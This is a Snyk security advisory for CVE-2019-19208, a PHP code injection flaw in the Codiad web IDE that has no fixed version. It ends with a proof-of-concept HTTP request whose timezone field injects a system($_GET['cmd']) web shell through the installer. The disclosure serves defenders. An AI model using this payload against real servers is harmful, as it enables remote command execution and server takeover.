Homepage
About Snyk

Arbitrary Code Execution Affecting codiad/codiad package, versions >=0.0.0

0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 34.67% (98th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PHP-CODIADCODIAD-560364
  • published 16 Mar 2020
  • disclosed 16 Mar 2020
  • credit Tobias Neitzel of usd AG
Report a new vulnerability Found a mistake?

Introduced: 16 Mar 2020

CVE-2019-19208 Open this link in a new tab
CWE-94 Open this link in a new tab

How to fix?

There is no fixed version for codiad/codiad.

Overview

codiad/codiad is a web-based IDE framework with a small footprint and minimal requirements.

Affected versions of this package are vulnerable to Arbitrary Code Execution. Allows PHP Code injection.

PoC by Tobias Neitzel 

POST /components/install/process.php HTTP/1.1
Host: codiad.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 170

path=/var/www/html/data&username=/tmp/dada&password=/tmp/dada&project_name=/tmp/dada&project_path=/var/www/html/data/data&timezone='")%3b+system($_GET["cmd"])%3b+print("'